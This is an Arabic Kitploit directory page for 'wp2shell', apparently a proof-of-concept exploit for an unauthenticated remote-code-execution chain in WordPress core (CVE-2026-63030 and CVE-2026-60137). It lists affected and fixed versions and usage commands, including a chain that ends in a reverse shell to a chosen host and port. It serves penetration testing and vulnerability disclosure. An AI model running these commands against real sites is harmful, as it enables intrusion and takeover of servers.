Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-63030 — استغلال (PoC) لثغرة RCE بدون مصادقة في WordPress Core المعروفة باسم WP2Shell | Kitploit
أدوات/GitHubGitHub/mverschu/cve-2026-63030
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرة
GitHubmverschu/cve-2026-63030

CVE-2026-63030

استغلال (PoC) لثغرة RCE بدون مصادقة في WordPress Core المعروفة باسم WP2Shell

عرض المستودع
41منذ شهر واحدلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

wp2shell (CVE-2026-63030 / CVE-2026-60137)

الاسمwp2shell
CVEsCVE-2026-63030 (عدم تزامن الدفعات), CVE-2026-60137 (حقن SQL عبر author__not_in)
المتأثرWordPress 6.9.0 إلى 6.9.4, 7.0.0 إلى 7.0.1
تم الإصلاح في6.9.5, 7.0.2
المصادقة المطلوبةلا شيء
اكتشفهAdam Kues (Searchlight Cyber / Assetnote)

الاستخدام

المضيف المجرد = كشف النطاق تلقائيًا (يحاول https:// ثم http://). أضف http:// أو https:// فقط عندما تريد فرض نطاق معين.

root@kitploit:~
# auto-detect scheme
wp2shell target.example
wp2shell 127.0.0.1:8080

# force a scheme
wp2shell https://target.example/
wp2shell http://127.0.0.1:8080/

# timing confirm
wp2shell target.example --confirm-sqli

# SQLi -> oEmbed/admin bridge -> plugin -> reverse shell
wp2shell target.example --shell
wp2shell target.example --shell 192.168.1.10 4443
تنزيل الأداة
العلمالوظيفة
--shell [LHOST [LPORT]]سلسلة RCE القياسية; LHOST الافتراضي هو عنوان IP لهذا الجهاز، LPORT هو 443
--rest-routeحاول استخدام /?rest_route=/batch/v1 أولاً
--verify-tlsتحقق من شهادات TLS (مغلق افتراضيًا للمختبر/الشهادات الذاتية التوقيع)
--proxy URLإرسال الحركة المرورية عبر وسيط (proxy)
--forceتجاوز التعرف على ووردبريس